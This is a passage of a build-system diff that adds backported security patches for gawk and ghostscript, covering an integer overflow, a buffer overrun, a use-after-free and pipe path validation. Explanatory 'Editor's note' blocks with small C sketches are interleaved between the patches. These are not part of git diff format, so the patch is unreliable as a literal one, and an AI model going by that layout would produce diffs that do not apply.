+DESCRIPTION = "GNU ed is a line-oriented text editor. It is used to create, display, modify and otherwise manipulate text files, both interactively and via shell scripts. A restricted version of ed, red, can only edit files in the current directory and cannot execute shell commands."
LICENSE = "GPLv3+"
LIC_FILES_CHKSUM = "file://COPYING;md5=0c7051aef9219dc7237f206c5c4179a7 \
diff --git a/meta/recipes-extended/gawk/gawk/CVE-2023-4156.patch b/meta/recipes-extended/gawk/gawk/CVE-2023-4156.patch
new file mode 100644
index 0000000000..c6cba058a7
--- /dev/null
+++ b/meta/recipes-extended/gawk/gawk/CVE-2023-4156.patch
@@ -0,0 +1,28 @@
+From e709eb829448ce040087a3fc5481db6bfcaae212 Mon Sep 17 00:00:00 2001
+From: "Arnold D. Robbins" <arnold@skeeve.com>
+Date: Wed, 3 Aug 2022 13:00:54 +0300
+Subject: [PATCH] Small bug fix in builtin.c.
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/gawk/tree/debian/patches/CVE-2023-4156.patch?h=ubuntu/focal-security
+Upstream commit https://git.savannah.gnu.org/gitweb/?p=gawk.git;a=commitdiff;h=e709eb829448ce040087a3fc5481db6bfcaae212]
+CVE: CVE-2023-4156
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ ChangeLog | 6 ++++++
+ builtin.c | 5 ++++-
+ 2 files changed, 10 insertions(+), 1 deletion(-)
+
+--- gawk-5.1.0.orig/builtin.c
++++ gawk-5.1.0/builtin.c
+@@ -957,7 +957,10 @@ check_pos:
+ s1++;
+ n0--;
+ }
+- if (val >= num_args) {
++ // val could be less than zero if someone provides a field width
++ // so large that it causes integer overflow. Mainly fuzzers do this,
++ // but let's try to be good anyway.
++ if (val < 0 || val >= num_args) {
+ toofew = true;
+ break;
+ }
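Editor's note: the added "val < 0" test above guards against a positional/width value that has wrapped negative. The same defensive check, reduced to a standalone sketch with assumed names:

    /* sketch: validate a user-supplied argument index before using it */
    #include <assert.h>

    static int index_ok (long val, long num_args)
    {
      /* reject both overflowed (negative) and out-of-range values */
      return val >= 0 && val < num_args;
    }

    int main (void)
    {
      assert (index_ok (2, 5));
      assert (!index_ok (7, 5));
      assert (!index_ok (-1, 5));   /* e.g. the result of a wrapped-around parse */
      return 0;
    }
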
diff --git a/meta/recipes-extended/gawk/gawk/remove-sensitive-tests.patch b/meta/recipes-extended/gawk/gawk/remove-sensitive-tests.patch
new file mode 100644
index 0000000000..167c0787ee
--- /dev/null
+++ b/meta/recipes-extended/gawk/gawk/remove-sensitive-tests.patch
@@ -0,0 +1,24 @@
+These tests require an unloaded host, as otherwise timing-sensitive tests can fail
+https://bugzilla.yoctoproject.org/show_bug.cgi?id=14371
+
+Upstream-Status: Inappropriate
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+--- a/test/Maketests~
++++ b/test/Maketests
+@@ -2069,7 +2069,2 @@
+
+-timeout:
+- @echo $@ $(ZOS_FAIL)
+- @AWKPATH="$(srcdir)" $(AWK) -f $@.awk >_$@ 2>&1 || echo EXIT CODE: $$? >>_$@
+- @-$(CMP) "$(srcdir)"/$@.ok _$@ && rm -f _$@
+-
+ typedregex1:
+@@ -2297,7 +2292,2 @@
+ @-$(CMP) "$(srcdir)"/$@.ok _$@ && rm -f _$@
+-
+-time:
+- @echo $@
+- @AWKPATH="$(srcdir)" $(AWK) -f $@.awk >_$@ 2>&1 || echo EXIT CODE: $$? >>_$@
+- @-$(CMP) "$(srcdir)"/$@.ok _$@ && rm -f _$@
+
diff --git a/meta/recipes-extended/gawk/gawk_5.0.1.bb b/meta/recipes-extended/gawk/gawk_5.0.1.bb
index e79ccfdebf..c71890c19e 100644
--- a/meta/recipes-extended/gawk/gawk_5.0.1.bb
+++ b/meta/recipes-extended/gawk/gawk_5.0.1.bb
@@ -16,7 +16,9 @@ PACKAGECONFIG[readline] = "--with-readline,--without-readline,readline"
PACKAGECONFIG[mpfr] = "--with-mpfr,--without-mpfr, mpfr"
SRC_URI = "${GNU_MIRROR}/gawk/gawk-${PV}.tar.gz \
+ file://remove-sensitive-tests.patch \
file://run-ptest \
+ file://CVE-2023-4156.patch \
"
SRC_URI[md5sum] = "c5441c73cc451764055ee65e9a4292bb"
@@ -41,13 +43,20 @@ inherit ptest
do_install_ptest() {
mkdir ${D}${PTEST_PATH}/test
ln -s ${bindir}/gawk ${D}${PTEST_PATH}/gawk
- for i in `grep -vE "@|^$|#|Gt-dummy" ${S}/test/Maketests |awk -F: '{print $1}'` Maketests inclib.awk; \
- do cp ${S}/test/$i* ${D}${PTEST_PATH}/test; \
+ # The list of tests is all targets in Maketests, apart from the dummy Gt-dummy
+ TESTS=$(awk -F: '$1 == "Gt-dummy" { next } /[[:alnum:]]+:$/ { print $1 }' ${S}/test/Maketests)
+ for i in $TESTS Maketests inclib.awk; do
+ cp ${S}/test/$i* ${D}${PTEST_PATH}/test
done
sed -i -e 's|/usr/local/bin|${bindir}|g' \
-e 's|#!${base_bindir}/awk|#!${bindir}/awk|g' ${D}${PTEST_PATH}/test/*.awk
- sed -i -e "s|GAWKLOCALE|LANG|g" ${D}${PTEST_PATH}/test/Maketests
+ sed -i -e "s|GAWKLOCALE|LANG|g" ${D}${PTEST_PATH}/test/Maketests
+
+ # These tests require an unloaded host as otherwise timing sensitive tests can fail
+ # https://bugzilla.yoctoproject.org/show_bug.cgi?id=14371
+ rm -f ${D}${PTEST_PATH}/test/time.*
+ rm -f ${D}${PTEST_PATH}/test/timeout.*
}
RDEPENDS_${PN}-ptest += "make"
diff --git a/meta/recipes-extended/ghostscript/ghostscript/0001-Bug-706897-Copy-pcx-buffer-overrun-fix-from-devices-.patch b/meta/recipes-extended/ghostscript/ghostscript/0001-Bug-706897-Copy-pcx-buffer-overrun-fix-from-devices-.patch
new file mode 100644
index 0000000000..91b9f6df50
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/0001-Bug-706897-Copy-pcx-buffer-overrun-fix-from-devices-.patch
@@ -0,0 +1,31 @@
+From d81b82c70bc1fb9991bb95f1201abb5dea55f57f Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Mon, 17 Jul 2023 14:06:37 +0100
+Subject: [PATCH] Bug 706897: Copy pcx buffer overrun fix from
+ devices/gdevpcx.c
+
+Bounds check the buffer, before dereferencing the pointer.
+
+Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=d81b82c70bc1fb9991bb95f1201abb5dea55f57f]
+CVE: CVE-2023-38559
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ base/gdevdevn.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/base/gdevdevn.c b/base/gdevdevn.c
+index 3b019d6..2888776 100644
+--- a/base/gdevdevn.c
++++ b/base/gdevdevn.c
+@@ -1980,7 +1980,7 @@ devn_pcx_write_rle(const byte * from, const byte * end, int step, gp_file * file
+ byte data = *from;
+
+ from += step;
+- if (data != *from || from == end) {
++ if (from >= end || data != *from) {
+ if (data >= 0xc0)
+ gp_fputc(0xc1, file);
+ } else {
+--
+2.25.1
+
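Editor's note: the reordered condition above is the usual "bounds-check before dereference" rule for run-length scanning. A small self-contained sketch of the same idiom (hypothetical, not the ghostscript device code):

    /* sketch: count a run without reading past the end of the buffer */
    #include <assert.h>
    #include <stddef.h>

    static size_t run_length (const unsigned char *from, const unsigned char *end)
    {
      const unsigned char *p = from;

      while (p + 1 < end && p[1] == p[0])   /* check bounds before comparing */
        p++;

      return (size_t) (p - from) + 1;
    }

    int main (void)
    {
      const unsigned char buf[] = { 7, 7, 7, 3 };

      assert (run_length (buf, buf + sizeof buf) == 3);
      assert (run_length (buf + 3, buf + sizeof buf) == 1);  /* run ending at the edge */
      return 0;
    }
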
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2020-36773.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2020-36773.patch
new file mode 100644
index 0000000000..ea8bf26f3f
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2020-36773.patch
@@ -0,0 +1,109 @@
+From 8c7bd787defa071c96289b7da9397f673fddb874 Mon Sep 17 00:00:00 2001
+From: Ken Sharp <ken.sharp@artifex.com>
+Date: Wed, 20 May 2020 16:02:07 +0100
+Subject: [PATCH] txtwrite - address memory problems
+
+Bug #702229 " txtwrite: use after free in 9.51 on some files (regression from 9.50)"
+Also bug #702346 and the earlier report #701877.
+
+The problems occur because it's possible for a single character code in
+a PDF file to map to more than a single Unicode code point. In the case
+of the file for 701877 the character code maps to 'f' and 'i' (it is an
+fi ligature).
+
+The code should deal with this, but we need to ensure we are using the
+correct index. In addition, if we do get more Unicode code points than
+we expected, we need to set the widths of the 'extra' code points to
+zero (we only want to consider the width of the original character).
+
+This does mean increasing the size of the Widths array to cater for
+the possibility of more entries on output than there were on input.
+
+While working on it I noticed that the Unicode remapping on little-
+endian machines was reversing the order of the Unicode values, when
+there was more than a single code point returned, so fixed that at
+the same time.
+
+Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;h=8c7bd787defa071c96289b7da9397f673fddb874]
+CVE: CVE-2020-36773
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ devices/vector/gdevtxtw.c | 26 ++++++++++++++++----------
+ 1 file changed, 16 insertions(+), 10 deletions(-)
+
+diff --git a/devices/vector/gdevtxtw.c b/devices/vector/gdevtxtw.c
+index 87f9355..bddce5a 100644
+--- a/devices/vector/gdevtxtw.c
++++ b/devices/vector/gdevtxtw.c
+@@ -1812,11 +1812,11 @@ static int get_unicode(textw_text_enum_t *penum, gs_font *font, gs_glyph glyph,
+ #else
+ b = (char *)Buffer;
+ u = (char *)unicode;
+- while (l >= 0) {
+- *b++ = *(u + l);
+- l--;
+- }
+
++ for (l=0;l<length;l+=2, u+=2){
++ *b++ = *(u+1);
++ *b++ = *u;
++ }
+ #endif
+ gs_free_object(penum->dev->memory, unicode, "free temporary unicode buffer");
+ return length / sizeof(short);
+@@ -1963,7 +1963,7 @@ txtwrite_process_plain_text(gs_text_enum_t *pte)
+ &penum->text_state->matrix, &wanted);
+ pte->returned.total_width.x += wanted.x;
+ pte->returned.total_width.y += wanted.y;
+- penum->Widths[pte->index - 1] = wanted.x;
++ penum->Widths[penum->TextBufferIndex] = wanted.x;
+
+ if (pte->text.operation & TEXT_ADD_TO_ALL_WIDTHS) {
+ gs_point tpt;
+@@ -1984,8 +1984,14 @@ txtwrite_process_plain_text(gs_text_enum_t *pte)
+ pte->returned.total_width.x += dpt.x;
+ pte->returned.total_width.y += dpt.y;
+
+- penum->TextBufferIndex += get_unicode(penum, (gs_font *)pte->orig_font, glyph, ch, &penum->TextBuffer[penum->TextBufferIndex]);
+- penum->Widths[pte->index - 1] += dpt.x;
++ penum->Widths[penum->TextBufferIndex] += dpt.x;
++ code = get_unicode(penum, (gs_font *)pte->orig_font, glyph, ch, &penum->TextBuffer[penum->TextBufferIndex]);
++ /* If a single text code returned multiple Unicode values, then we need to set the
++ * 'extra' code points' widths to 0.
++ */
++ if (code > 1)
++ memset(&penum->Widths[penum->TextBufferIndex + 1], 0x00, (code - 1) * sizeof(float));
++ penum->TextBufferIndex += code;
+ }
+ return 0;
+ }
+@@ -2123,7 +2129,7 @@ txt_add_fragment(gx_device_txtwrite_t *tdev, textw_text_enum_t *penum)
+ if (!penum->text_state->Widths)
+ return gs_note_error(gs_error_VMerror);
+ memset(penum->text_state->Widths, 0x00, penum->TextBufferIndex * sizeof(float));
+- memcpy(penum->text_state->Widths, penum->Widths, penum->text.size * sizeof(float));
++ memcpy(penum->text_state->Widths, penum->Widths, penum->TextBufferIndex * sizeof(float));
+
+ unsorted_entry->Unicode_Text = (unsigned short *)gs_malloc(tdev->memory->stable_memory,
+ penum->TextBufferIndex, sizeof(unsigned short), "txtwrite alloc sorted text buffer");
+@@ -2136,7 +2142,7 @@ txt_add_fragment(gx_device_txtwrite_t *tdev, textw_text_enum_t *penum)
+ if (!unsorted_entry->Widths)
+ return gs_note_error(gs_error_VMerror);
+ memset(unsorted_entry->Widths, 0x00, penum->TextBufferIndex * sizeof(float));
+- memcpy(unsorted_entry->Widths, penum->Widths, penum->text.size * sizeof(float));
++ memcpy(unsorted_entry->Widths, penum->Widths, penum->TextBufferIndex * sizeof(float));
+
+ unsorted_entry->FontName = (char *)gs_malloc(tdev->memory->stable_memory,
+ (strlen(penum->text_state->FontName) + 1), sizeof(unsigned char), "txtwrite alloc sorted text buffer");
+@@ -2192,7 +2198,7 @@ textw_text_process(gs_text_enum_t *pte)
+ if (!penum->TextBuffer)
+ return gs_note_error(gs_error_VMerror);
+ penum->Widths = (float *)gs_malloc(tdev->memory->stable_memory,
+- pte->text.size, sizeof(float), "txtwrite temporary widths array");
++ pte->text.size * 4, sizeof(float), "txtwrite temporary widths array");
+ if (!penum->Widths)
+ return gs_note_error(gs_error_VMerror);
+ }
+--
+2.25.1
+
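Editor's note: one detail from the commit message above, swapping bytes per 16-bit code unit without reversing the order of the code units, can be shown in isolation. A hedged sketch with assumed names, using the same "fi" ligature example:

    /* sketch: byte-swap UTF-16 code units in place, preserving their order */
    #include <assert.h>
    #include <stddef.h>

    static void swap_utf16 (unsigned char *buf, size_t bytes)
    {
      size_t i;

      for (i = 0; i + 1 < bytes; i += 2)
        {
          unsigned char t = buf[i];
          buf[i] = buf[i + 1];
          buf[i + 1] = t;
        }
    }

    int main (void)
    {
      /* "fi" as little-endian UTF-16: 66 00 69 00 */
      unsigned char s[] = { 0x66, 0x00, 0x69, 0x00 };

      swap_utf16 (s, sizeof s);
      /* big-endian result keeps 'f' before 'i': 00 66 00 69 */
      assert (s[0] == 0x00 && s[1] == 0x66 && s[2] == 0x00 && s[3] == 0x69);
      return 0;
    }
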
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_1.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_1.patch
new file mode 100644
index 0000000000..033ba77f9a
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_1.patch
@@ -0,0 +1,121 @@
+From 3920a727fb19e19f597e518610ce2416d08cb75f Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Thu, 20 Aug 2020 17:19:09 +0100
+Subject: [PATCH] Fix pdfwrite "%d" mode with file permissions
+
+Firstly, in gx_device_delete_output_file the iodev pointer was being passed
+to the delete_method incorrectly (passing a pointer to that pointer). Thus
+when we attempted to use that to confirm permission to delete the file, it
+crashed. Credit to Ken for finding that.
+
+Secondly, due to the way pdfwrite works, when running with an output file per
+page, it creates the current output file immediately it has completed writing
+the previous one. Thus, it has to delete that partial file on exit.
+
+Previously, the output file was not added to the "control" permission list,
+so an attempt to delete it would result in an error. So add the output file
+to the "control" as well as "write" list.
+
+CVE: CVE-2021-3781
+
+Upstream-Status: Backport:
+https://git.ghostscript.com/?p=ghostpdl.git;a=commit;f=base/gslibctx.c;h=3920a727fb19e19f597e518610ce2416d08cb75f
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ base/gsdevice.c | 2 +-
+ base/gslibctx.c | 20 ++++++++++++++------
+ 2 files changed, 15 insertions(+), 7 deletions(-)
+
+diff --git a/base/gsdevice.c b/base/gsdevice.c
+index 913119495..ac78af93f 100644
+--- a/base/gsdevice.c
++++ b/base/gsdevice.c
+@@ -1185,7 +1185,7 @@ int gx_device_delete_output_file(const gx_device * dev, const char *fname)
+ parsed.len = strlen(parsed.fname);
+ }
+ if (parsed.iodev)
+- code = parsed.iodev->procs.delete_file((gx_io_device *)(&parsed.iodev), (const char *)parsed.fname);
++ code = parsed.iodev->procs.delete_file((gx_io_device *)(parsed.iodev), (const char *)parsed.fname);
+ else
+ code = gs_note_error(gs_error_invalidfileaccess);
+
+diff --git a/base/gslibctx.c b/base/gslibctx.c
+index d726c58b5..ff8fc895e 100644
+--- a/base/gslibctx.c
++++ b/base/gslibctx.c
+@@ -647,7 +647,7 @@ gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname)
+ char *fp, f[gp_file_name_sizeof];
+ const int pipe = 124; /* ASCII code for '|' */
+ const int len = strlen(fname);
+- int i;
++ int i, code;
+
+ /* Be sure the string copy will fit */
+ if (len >= gp_file_name_sizeof)
+@@ -658,8 +658,6 @@ gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname)
+ rewrite_percent_specifiers(f);
+ for (i = 0; i < len; i++) {
+ if (f[i] == pipe) {
+- int code;
+-
+ fp = &f[i + 1];
+ /* Because we potentially have to check file permissions at two levels
+ for the output file (gx_device_open_output_file and the low level
+@@ -671,10 +669,16 @@ gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname)
+ if (code < 0)
+ return code;
+ break;
++ code = gs_add_control_path(mem, gs_permit_file_control, f);
++ if (code < 0)
++ return code;
+ }
+ if (!IS_WHITESPACE(f[i]))
+ break;
+ }
++ code = gs_add_control_path(mem, gs_permit_file_control, fp);
++ if (code < 0)
++ return code;
+ return gs_add_control_path(mem, gs_permit_file_writing, fp);
+ }
+
+@@ -684,7 +688,7 @@ gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname)
+ char *fp, f[gp_file_name_sizeof];
+ const int pipe = 124; /* ASCII code for '|' */
+ const int len = strlen(fname);
+- int i;
++ int i, code;
+
+ /* Be sure the string copy will fit */
+ if (len >= gp_file_name_sizeof)
+@@ -694,8 +698,6 @@ gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname)
+ /* Try to rewrite any %d (or similar) in the string */
+ for (i = 0; i < len; i++) {
+ if (f[i] == pipe) {
+- int code;
+-
+ fp = &f[i + 1];
+ /* Because we potentially have to check file permissions at two levels
+ for the output file (gx_device_open_output_file and the low level
+@@ -704,6 +706,9 @@ gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname)
+ the pipe_fopen(), the leading '|' has been stripped.
+ */
+ code = gs_remove_control_path(mem, gs_permit_file_writing, f);
++ if (code < 0)
++ return code;
++ code = gs_remove_control_path(mem, gs_permit_file_control, f);
+ if (code < 0)
+ return code;
+ break;
+@@ -711,6 +716,9 @@ gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname)
+ if (!IS_WHITESPACE(f[i]))
+ break;
+ }
++ code = gs_remove_control_path(mem, gs_permit_file_control, fp);
++ if (code < 0)
++ return code;
+ return gs_remove_control_path(mem, gs_permit_file_writing, fp);
+ }
+
+--
+2.25.1
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_2.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_2.patch
new file mode 100644
index 0000000000..beade79eef
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_2.patch
@@ -0,0 +1,37 @@
+From 9daf042fd7bb19e93388d89d9686a2fa4496f382 Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Mon, 24 Aug 2020 09:24:31 +0100
+Subject: [PATCH] Coverity 361429: move "break" to correct place.
+
+We had to add the outputfile to the "control" file permission list (as well
+as write), but for the "pipe" case, I accidentally added the call after the
+break out of loop that checks for a pipe.
+
+CVE: CVE-2021-3781
+
+Upstream-Status: Backport:
+https://git.ghostscript.com/?p=ghostpdl.git;a=commit;f=base/gslibctx.c;h=9daf042fd7bb19e93388d89d9686a2fa4496f382
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ base/gslibctx.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/base/gslibctx.c b/base/gslibctx.c
+index ff8fc895e..63dfbe2e0 100644
+--- a/base/gslibctx.c
++++ b/base/gslibctx.c
+@@ -668,10 +668,10 @@ gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname)
+ code = gs_add_control_path(mem, gs_permit_file_writing, f);
+ if (code < 0)
+ return code;
+- break;
+ code = gs_add_control_path(mem, gs_permit_file_control, f);
+ if (code < 0)
+ return code;
++ break;
+ }
+ if (!IS_WHITESPACE(f[i]))
+ break;
+--
+2.25.1
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_3.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_3.patch
new file mode 100644
index 0000000000..e3f9e81c45
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_3.patch
@@ -0,0 +1,238 @@
+From a9bd3dec9fde03327a4a2c69dad1036bf9632e20 Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Tue, 7 Sep 2021 20:36:12 +0100
+Subject: [PATCH] Bug 704342: Include device specifier strings in access
+ validation
+
+for the "%pipe%", %handle%" and %printer% io devices.
+
+We previously validated only the part after the "%pipe%" Postscript device
+specifier, but this proved insufficient.
+
+This rebuilds the original file name string, and validates it complete. The
+slight complication for "%pipe%" is it can be reached implicitly using
+"|" so we have to check both prefixes.
+
+Addresses CVE-2021-3781
+
+CVE: CVE-2021-3781
+
+Upstream-Status: Backport:
+https://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=a9bd3dec9fde
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ base/gdevpipe.c | 22 +++++++++++++++-
+ base/gp_mshdl.c | 11 +++++++-
+ base/gp_msprn.c | 10 ++++++-
+ base/gp_os2pr.c | 13 +++++++++-
+ base/gslibctx.c | 69 ++++++++++---------------------------------------
+ 5 files changed, 65 insertions(+), 60 deletions(-)
+
+diff --git a/base/gdevpipe.c b/base/gdevpipe.c
+index 96d71f5d8..5bdc485be 100644
+--- a/base/gdevpipe.c
++++ b/base/gdevpipe.c
+@@ -72,8 +72,28 @@ pipe_fopen(gx_io_device * iodev, const char *fname, const char *access,
+ #else
+ gs_lib_ctx_t *ctx = mem->gs_lib_ctx;
+ gs_fs_list_t *fs = ctx->core->fs;
++ /* The pipe device can be reached in two ways, explicitly with %pipe%
++ or implicitly with "|", so we have to check for both
++ */
++ char f[gp_file_name_sizeof];
++ const char *pipestr = "|";
++ const size_t pipestrlen = strlen(pipestr);
++ const size_t preflen = strlen(iodev->dname);
++ const size_t nlen = strlen(fname);
++ int code1;
++
++ if (preflen + nlen >= gp_file_name_sizeof)
++ return_error(gs_error_invalidaccess);
++
++ memcpy(f, iodev->dname, preflen);
++ memcpy(f + preflen, fname, nlen + 1);
++
++ code1 = gp_validate_path(mem, f, access);
++
++ memcpy(f, pipestr, pipestrlen);
++ memcpy(f + pipestrlen, fname, nlen + 1);
+
+- if (gp_validate_path(mem, fname, access) != 0)
++ if (code1 != 0 && gp_validate_path(mem, f, access) != 0 )
+ return gs_error_invalidfileaccess;
+
+ /*
+diff --git a/base/gp_mshdl.c b/base/gp_mshdl.c
+index 2b964ed74..8d87ceadc 100644
+--- a/base/gp_mshdl.c
++++ b/base/gp_mshdl.c
+@@ -95,8 +95,17 @@ mswin_handle_fopen(gx_io_device * iodev, const char *fname, const char *access,
+ long hfile; /* Correct for Win32, may be wrong for Win64 */
+ gs_lib_ctx_t *ctx = mem->gs_lib_ctx;
+ gs_fs_list_t *fs = ctx->core->fs;
++ char f[gp_file_name_sizeof];
++ const size_t preflen = strlen(iodev->dname);
++ const size_t nlen = strlen(fname);
+
+- if (gp_validate_path(mem, fname, access) != 0)
++ if (preflen + nlen >= gp_file_name_sizeof)
++ return_error(gs_error_invalidaccess);
++
++ memcpy(f, iodev->dname, preflen);
++ memcpy(f + preflen, fname, nlen + 1);
++
++ if (gp_validate_path(mem, f, access) != 0)
+ return gs_error_invalidfileaccess;
+
+ /* First we try the open_handle method. */
+diff --git a/base/gp_msprn.c b/base/gp_msprn.c
+index ed4827968..746a974f7 100644
+--- a/base/gp_msprn.c
++++ b/base/gp_msprn.c
+@@ -168,8 +168,16 @@ mswin_printer_fopen(gx_io_device * iodev, const char *fname, const char *access,
+ unsigned long *ptid = &((tid_t *)(iodev->state))->tid;
+ gs_lib_ctx_t *ctx = mem->gs_lib_ctx;
+ gs_fs_list_t *fs = ctx->core->fs;
++ const size_t preflen = strlen(iodev->dname);
++ const size_t nlen = strlen(fname);
+
+- if (gp_validate_path(mem, fname, access) != 0)
++ if (preflen + nlen >= gp_file_name_sizeof)
++ return_error(gs_error_invalidaccess);
++
++ memcpy(pname, iodev->dname, preflen);
++ memcpy(pname + preflen, fname, nlen + 1);
++
++ if (gp_validate_path(mem, pname, access) != 0)
+ return gs_error_invalidfileaccess;
+
+ /* First we try the open_printer method. */
+diff --git a/base/gp_os2pr.c b/base/gp_os2pr.c
+index f852c71fc..ba54cde66 100644
+--- a/base/gp_os2pr.c
++++ b/base/gp_os2pr.c
+@@ -107,9 +107,20 @@ os2_printer_fopen(gx_io_device * iodev, const char *fname, const char *access,
+ FILE ** pfile, char *rfname, uint rnamelen)
+ {
+ os2_printer_t *pr = (os2_printer_t *)iodev->state;
+- char driver_name[256];
++ char driver_name[gp_file_name_sizeof];
+ gs_lib_ctx_t *ctx = mem->gs_lib_ctx;
+ gs_fs_list_t *fs = ctx->core->fs;
++ const size_t preflen = strlen(iodev->dname);
++ const size_t nlen = strlen(fname);
++
++ if (preflen + nlen >= gp_file_name_sizeof)
++ return_error(gs_error_invalidaccess);
++
++ memcpy(driver_name, iodev->dname, preflen);
++ memcpy(driver_name + preflen, fname, nlen + 1);
++
++ if (gp_validate_path(mem, driver_name, access) != 0)
++ return gs_error_invalidfileaccess;
+
+ /* First we try the open_printer method. */
+ /* Note that the loop condition here ensures we don't
+diff --git a/base/gslibctx.c b/base/gslibctx.c
+index 6dfed6cd5..318039fad 100644
+--- a/base/gslibctx.c
++++ b/base/gslibctx.c
+@@ -655,82 +655,39 @@ rewrite_percent_specifiers(char *s)
+ int
+ gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname)
+ {
+- char *fp, f[gp_file_name_sizeof];
+- const int pipe = 124; /* ASCII code for '|' */
+- const int len = strlen(fname);
+- int i, code;
++ char f[gp_file_name_sizeof];
++ int code;
+
+ /* Be sure the string copy will fit */
+- if (len >= gp_file_name_sizeof)
++ if (strlen(fname) >= gp_file_name_sizeof)
+ return gs_error_rangecheck;
+ strcpy(f, fname);
+- fp = f;
+ /* Try to rewrite any %d (or similar) in the string */
+ rewrite_percent_specifiers(f);
+- for (i = 0; i < len; i++) {
+- if (f[i] == pipe) {
+- fp = &f[i + 1];
+- /* Because we potentially have to check file permissions at two levels
+- for the output file (gx_device_open_output_file and the low level
+- fopen API, if we're using a pipe, we have to add both the full string,
+- (including the '|', and just the command to which we pipe - since at
+- the pipe_fopen(), the leading '|' has been stripped.
+- */
+- code = gs_add_control_path(mem, gs_permit_file_writing, f);
+- if (code < 0)
+- return code;
+- code = gs_add_control_path(mem, gs_permit_file_control, f);
+- if (code < 0)
+- return code;
+- break;
+- }
+- if (!IS_WHITESPACE(f[i]))
+- break;
+- }
+- code = gs_add_control_path(mem, gs_permit_file_control, fp);
++
++ code = gs_add_control_path(mem, gs_permit_file_control, f);
+ if (code < 0)
+ return code;
+- return gs_add_control_path(mem, gs_permit_file_writing, fp);
++ return gs_add_control_path(mem, gs_permit_file_writing, f);
+ }
+
+ int
+ gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname)
+ {
+- char *fp, f[gp_file_name_sizeof];
+- const int pipe = 124; /* ASCII code for '|' */
+- const int len = strlen(fname);
+- int i, code;
++ char f[gp_file_name_sizeof];
++ int code;
+
+ /* Be sure the string copy will fit */
+- if (len >= gp_file_name_sizeof)
++ if (strlen(fname) >= gp_file_name_sizeof)
+ return gs_error_rangecheck;
+ strcpy(f, fname);
+- fp = f;
+ /* Try to rewrite any %d (or similar) in the string */
+- for (i = 0; i < len; i++) {
+- if (f[i] == pipe) {
+- fp = &f[i + 1];
+- /* Because we potentially have to check file permissions at two levels
+- for the output file (gx_device_open_output_file and the low level
+- fopen API, if we're using a pipe, we have to add both the full string,
+- (including the '|', and just the command to which we pipe - since at
+- the pipe_fopen(), the leading '|' has been stripped.
+- */
+- code = gs_remove_control_path(mem, gs_permit_file_writing, f);
+- if (code < 0)
+- return code;
+- code = gs_remove_control_path(mem, gs_permit_file_control, f);
+- if (code < 0)
+- return code;
+- break;
+- }
+- if (!IS_WHITESPACE(f[i]))
+- break;
+- }
+- code = gs_remove_control_path(mem, gs_permit_file_control, fp);
++ rewrite_percent_specifiers(f);
++
++ code = gs_remove_control_path(mem, gs_permit_file_control, f);
+ if (code < 0)
+ return code;
+- return gs_remove_control_path(mem, gs_permit_file_writing, fp);
++ return gs_remove_control_path(mem, gs_permit_file_writing, f);
+ }
+
+ int
+--
+2.25.1
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-45949.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-45949.patch
new file mode 100644
index 0000000000..f312f89e04
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-45949.patch
@@ -0,0 +1,65 @@
+From 6643ff0cb837db3eade489ffff21e3e92eee2ae0 Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Fri, 28 Jan 2022 08:21:19 +0000
+Subject: [PATCH] Bug 703902: Fix op stack management in
+ sampled_data_continue()
+
+Replace pop() (which does no checking, and doesn't handle stack extension
+blocks) with ref_stack_pop() which does do all that.
+
+We still use pop() in one case (it's faster), but we have to later use
+ref_stack_pop() before calling sampled_data_sample() which also accesses the
+op stack.
+
+Fixes:
+https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=34675
+
